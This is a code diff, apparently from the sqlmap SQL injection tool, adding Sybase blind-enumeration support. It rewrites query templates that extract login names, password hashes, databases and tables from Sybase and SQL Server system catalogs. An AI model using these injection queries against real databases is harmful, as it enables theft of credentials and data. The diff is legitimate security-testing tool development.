diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py
index f96e9accc..8c10c6edd 100644
--- a/plugins/dbms/sybase/enumeration.py
+++ b/plugins/dbms/sybase/enumeration.py
@@ -16,9 +16,3 @@ from plugins.generic.enumeration import Enumeration as GenericEnumeration
 class Enumeration(GenericEnumeration):
     def __init__(self):
         GenericEnumeration.__init__(self, "Sybase")
-
-    def getPasswordHashes(self):
-        warnMsg = "on Sybase it is not possible to enumerate the user password hashes"
-        logger.warn(warnMsg)
-
-        return {}
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
index 817b291b8..07d311c9a 100644
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@@ -167,7 +167,7 @@ class Enumeration:
 
             for index in indexRange:
                 if kb.dbms == "Sybase":
-                    query = rootQuery.blind.query % (','.join(map(lambda x: "'%s'" % x, kb.data.cachedUsers)) if kb.data.cachedUsers else "'%s'" % randomStr())
+                    query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
                 elif condition:
                     query = rootQuery.blind.query2 % index
                 else:
@@ -282,7 +282,9 @@ class Enumeration:
                 indexRange = getRange(count, plusOne=plusOne)
 
                 for index in indexRange:
-                    if kb.dbms == "Microsoft SQL Server":
+                    if kb.dbms == "Sybase":
+                        query = rootQuery.blind.query % (user, (kb.data.cachedUsersPasswords[-1] if kb.data.cachedUsersPasswords else " "))
+                    elif kb.dbms == "Microsoft SQL Server":
                         if kb.dbmsVersion[0] in ( "2005", "2008" ):
                             query = rootQuery.blind.query2 % (user, index, user)
                         else:
@@ -664,7 +666,9 @@ class Enumeration:
             indexRange = getRange(count)
 
             for index in indexRange:
-                if kb.dbms == "MySQL" and not kb.data.has_information_schema:
+                if kb.dbms == "Sybase":
+                    query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
+                elif kb.dbms == "MySQL" and not kb.data.has_information_schema:
                     query = rootQuery.blind.query2 % index
                 else:
                     query = rootQuery.blind.query % index
@@ -785,7 +789,9 @@ class Enumeration:
                 indexRange = getRange(count, plusOne=plusOne)
 
                 for index in indexRange:
-                    if kb.dbms in ("SQLite", "Firebird"):
+                    if kb.dbms == "Sybase":
+                        query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " "))
+                    elif kb.dbms in ("SQLite", "Firebird"):
                         query = rootQuery.blind.query % index
                     else:
                         query = rootQuery.blind.query % (db, index)
diff --git a/xml/queries.xml b/xml/queries.xml
index 22750830d..109321bd9 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -254,7 +254,7 @@
         </users>
         <passwords>
             <inband query="SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins" query2="SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins" condition="name"/>
-            <blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
+            <blind query="SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s')" query2="SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM sys.sql_logins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'" count2="SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'"/>
         </passwords>
         <!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
         <privileges/>
@@ -473,21 +473,21 @@
         <is_dba query="PATINDEX('%sa_role%', SHOW_ROLE())>0"/>
         <users>
             <inband query="SELECT name FROM master..syslogins ORDER BY 1"/>
-            <blind query="SELECT MIN(name) FROM master..syslogins WHERE name NOT IN (%s)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"/>
+            <blind query="SELECT MIN(name) FROM master..syslogins WHERE name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins"/>
         </users>
         <passwords>
             <inband query="SELECT name, password FROM master..syslogins" condition="name"/>
-            <blind query="SELECT TOP 1 password FROM master..syslogins WHERE name='%s' AND name NOT IN (SELECT TOP %d name FROM master..syslogins WHERE name='%s')" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'"/>
+            <blind query="SELECT MIN(password) FROM master..syslogins WHERE name='%s' AND password > '%s'" count="SELECT LTRIM(STR(COUNT(password))) FROM master..syslogins WHERE name='%s'"/>
         </passwords>
         <privileges/>
         <roles/>
         <dbs>
             <inband query="SELECT name FROM master..sysdatabases ORDER BY 1"/>
-            <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases)" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
+            <blind query="SELECT MIN(name) FROM master..sysdatabases WHERE name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
         </dbs>
         <tables>
             <inband query="SELECT name FROM %s..sysobjects WHERE type IN ('U') ORDER BY 1"/>
-            <blind query="SELECT TOP 1 name FROM %s..sysobjects WHERE type IN ('U') AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE type IN ('U'))" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
+            <blind query="SELECT MIN(name) FROM %s..sysobjects WHERE type IN ('U') AND name > '%s'" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE type IN ('U')"/>
         </tables>
         <columns>
             <inband query="SELECT %s..syscolumns.name, TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>
